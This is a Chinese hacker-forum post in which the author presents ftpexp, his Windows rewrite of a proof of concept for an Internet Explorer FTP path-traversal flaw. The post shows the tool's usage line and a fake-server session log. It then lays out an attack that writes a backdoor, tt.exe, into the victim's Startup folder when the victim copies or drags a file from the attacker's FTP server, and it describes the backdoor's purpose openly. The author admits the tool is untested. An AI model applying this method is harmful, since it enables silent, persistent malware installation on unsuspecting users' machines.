文章作者：无敌最寂寞[-273℃@EST]
信息来源：邪恶八进制 中国


漏洞详细描述见下面地址：
http://www.securiteam.com/windowsntfocus/5NP0615EKM.html

上面提供了*nix下的exloit，我重写了部分代码，改写成了win下的。运行后如下：
H:\temp\lcc\lcc>ftpexp tt.exe d:\tt.exe
      Internet Explorer FTP download path disclosure prof of concept
       rewrritten by 无敌最寂寞[EST]

fake ftp server is preparing to start...
now fake ftp server listened on local port 21!!

>> USER anonymous
>> PASS IEUser@
>> opts utf8 on
>> syst
>> site help
>> PWD
>> noop
>> CWD /
>> TYPE A
>> PORT 10,10,111,111,10,224
>> LIST
>> noop
>> CWD /


使用方法如下：


H:\temp\lcc\lcc>ftpexp
      Internet Explorer FTP download path disclosure prof of concept
       rewrritten by 无敌最寂寞[EST]

     Usage:ftpexp <local_file> <remote_file>


根据漏洞描述，当目标访问你的ftp 服务器时，如果有以下两个操作就会触发攻击：

* 右击文件－》“复制到文件夹”
* 托放

攻击模式如下：
比如你想把一个后门程序tt.exe传到目标机器上的启动目录里，那么你可以这样构造你的ftp服务器：



H:\temp\lcc\lcc>ftpexp .\tt.exe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\tt.exe

然后如果对方访问你的这个ftp服务器的话，不管他采取了上面哪个操作，tt.exe这个文件都会复制到它的启动目录里。

我没有测试，请各位朋友帮忙测试一下吧。

只能做被害对象帮人测试........因为我建不起FTP......呵呵

这个程序本身就是伪装成一个ftp服务器的，因此不需要额外创建ftp服务器。。